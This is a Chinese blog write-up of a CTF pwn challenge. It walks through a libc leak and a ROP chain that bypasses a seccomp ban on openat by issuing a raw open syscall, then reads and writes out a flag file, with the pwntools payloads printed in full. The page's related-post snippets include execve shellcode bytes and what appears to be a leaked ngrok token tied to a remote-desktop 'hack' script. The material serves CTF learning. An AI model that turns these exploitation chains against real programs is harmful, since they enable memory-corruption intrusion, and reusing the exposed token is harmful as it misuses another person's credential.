orw--libc

已于 2023-11-22 20:29:34 修改
阅读量256 收藏 4
点赞数
分类专栏: pwn 文章标签: linux 学习 c语言
于 2023-07-08 14:00:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/131610880
版权

        前言:最近打算学一手orw,然而网上的要么纯粹shellcode打的,简单到没有学习价值,要么是堆上的或者是那种目前菜鸡看不明白的汇编转的。。。正好想到以前学长出过orw的相关题,不过原环境需要检索查找flag,然后菜鸡还不怎么理解那种shellcraft写shell的。就把它搬到本地来,当作一个普普通通的用rop链来写的orw。(没有写这个的习惯,平时WP都是写的本地文件,不过网上也搜不到适合入门的,就写一写啦,而且看见好多爷都会写写,咱也跟风一下。)

        废话不多说,上题(虽然废话好像不少)。

        保护就简简单单的浅开了个nx(64位的)

        然后是沙箱,openat被禁了,这个当时没注意,还是有群里的师傅无私解答才发现的(要不然还不知道得困惑多久,太感谢啦)

   

然后就是前面的判断啦,学长们出的题还是很有趣味性的

普普通通的判断,来个-1就能跳转过来到smallbox了,但文字很有趣味呀

 

 然后这里有个朴实无华的栈溢出来用(给了这么大,我爱死)

先是泄露一下libc,back_addr我跳转回的是main函数(其实我也想直接跳转到这个smallbox来着,但是这个跳转多了会再puts卡住。。。所以还是回main吧)

payload = b'A'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back_addr)

 然后泄露出libc,可以从用ROPgadget从libc文件里找到pop_rdx_ret

 计算出libc基址,然后找了open read write。(其实mprotect用不到,还是对可执行理解不深来着,本来先让bss开了一点可执行,然后orw,后来发现不开也可以的。打完之后更加理解了可执行,可写可读是因为里面放的是变量)

libc_base = puts_addr - libc.sym['puts']
read_addr = libc_base +libc.sym['read']
open_addr = libc_base +libc.sym['open']
write_addr = libc_base +libc.sym['write']
pop_rdx= libc_base + 0xfdd4d
pop_rsi = libc_base + 0x28ed9
bss = 0x602000
mprotect_addr = libc_base +libc.sym['mprotect']
pop_rax = libc_base + 0x3f0a7
syscall_addr = libc_base +libc.sym['syscall']

         由于高版本libc里的open函数其实会调用openat,所以要用syscall来系统调用open。这里的syscall其实被打包成了函数(在群里师傅的提醒下咱第一次用,还以为跟ret2syscall例题中直接一条跳转的syscall呢,其实这个还封装好了对参数的调用。第一个参数会给rax,第二个会再给rdi,总之参数一次递推。)

写的时候没发现,所以用了syscall+23,寄存器自己提前pop好(其实不用这么麻烦)

然后先把flag这个名字写入bss

这里栈溢出跳转到read,然后往bss+0x500处写入了flag。(因为都是用read嘛,没有终止符号,也没有对应的标志后输出;刚开始还为怎么在跳转到read之后再输出,后来突然想到,我给那个read100个字节的填满不就好了,嘿嘿嘿)

这里是直接跳转回了那个smallbox函数

payload = b'A'*(0x48)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss+0x500)+p64(pop_rdx)+p64(0x100)+p64(read_addr) +p64(ret_addr)+ p64(0x400b0c)+b'A'*(120-8)

print(len(payload))

sd(payload)

sd('./flag\x00\x00')

 然后直接orw莽上去,对了,open要给第二个参数为0,可能是标置位的问题?

payload=b'A'*(0x48)+p64(pop_rdi)+p64(0x602500)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall_addr+23)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(0x602500)+p64(pop_rdx)+p64(0x100)+p64(read_addr)
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(0x602500)+p64(write_addr)

然后发送

吼吼吼,成功。

总结一下学习到的点吧:

1.高版本libc中调用open函数会调用openat函数,但它已经被禁用了

所以要使用syscall函数系统调用open(调用号是2)

但是低版本没有影响。

2.syscall函数相当于把rdi当作rax了,rsi->rdi其他参数依次递推

3.可以从libc里查找到各种pop

4.open需要将第二个参数置0

5.open打开后,需要选择一个地方去写入read,并且用write输出

6.read分开调用时,怎么做到用脚本输入呢?那就是把第一个read填满就好了。

以及不需要这种方法不需要无谓的mprotect。

XYYR-c
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4186
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2399
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
沙盒ORW
2301_79880752的博客
02-03 1901
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只能采取ORW,即open/read/write的组合方式来读取flag。
xyctf Pwn WP
qq_74026216的博客
04-28 863
利用jmp 短跳转 连接shellcode,用3个pop rsi 把栈中的0x114514000赋值给rsi ,syscall调用read写入sh。libc-2.35 add 存在溢出,将堆指针放在下一个chunk的prev_size中 ,chunk_list 指针free后未置0。思路:伪造chunk 造成堆块重叠,tcache bin attack 分配chunk到gift为system(/bin/sh)静态链接 ,栈溢出 ,mprotect改权限,打shellcode。
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8919
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
c沙箱与容器_orw技术分享
weixin_57140753的博客
11-24 1103
c沙箱与容器_orw技术分享
[BUUCTF]PWN——[极客大挑战 2019]Not Bad (orw_shellcode)
mcmuyanga的博客
01-30 2441
[极客大挑战 2019]Not Bad 附件 步骤
orw_shellcode_模板
huzai9527的博客
05-23 1503
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
Latency and Bandwidth Impact on GPU Systems - 2008 (ms-proj-gpgpu-latency-bandwidth)-计算机科学
04-22
orw eg ian Un ive rsit yo fS cie nce an dT ech no log yF acu lty of Info rma tio nT ech no log y, Ma the ma tics an dE lect rica l En gin ee rin gD ep art me nt of Co mp ute ra nd In form ati...
浅析3G网络安全.pdf
06-08
accord ing tO 3G netw ork dat a securi ty and ident ity auth ent icati on£ th e paper p ut f orw ard the i mpro vement sug gesti ons £ K e) £ w o r d s £" 3G netw or k £» net w or k sec ur it y ...
计算机系统基础第二次作业(1).doc
05-25
(1)movl 0xFF, (%eax) (2)movb %ax, 12(%ebp) (3)addl %ecx, $0xF0 (4)orw $0xFFFF0, (%ebx) (5)addb $0xF8, (%dl) (6)movl %bx, %eax (7)andl %esi, %esx (8)movw 8(%ebp, , 4), %ax 答: (1)...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
最新发布
appearappear的博客
06-12 273
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1191
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 345
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 775
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 793
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
Linux】生产者消费者模型——阻塞队列BlockQueue
AAlykk的博客
06-11 974
Linux有两个重要的模型,一个是生产者消费者模型——阻塞队列BlockQueue,另一个则是生产者消费者模型——环形队列RingQueue。今天我们学习其中一个模型:【Linux】生产者消费者模型——阻塞队列BlockQueue。⭐主体生产者消费模型高效在哪里?高效体现在一个线程拿出来任务可能正在做计算,它在做计算的同时,其他线程可以继续从队列中拿,继续做运算,高效并不是体现在从队列中拿数据高效!而是我们可以让一个、多个线程并发的同时计算多个任务!
return orw();
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值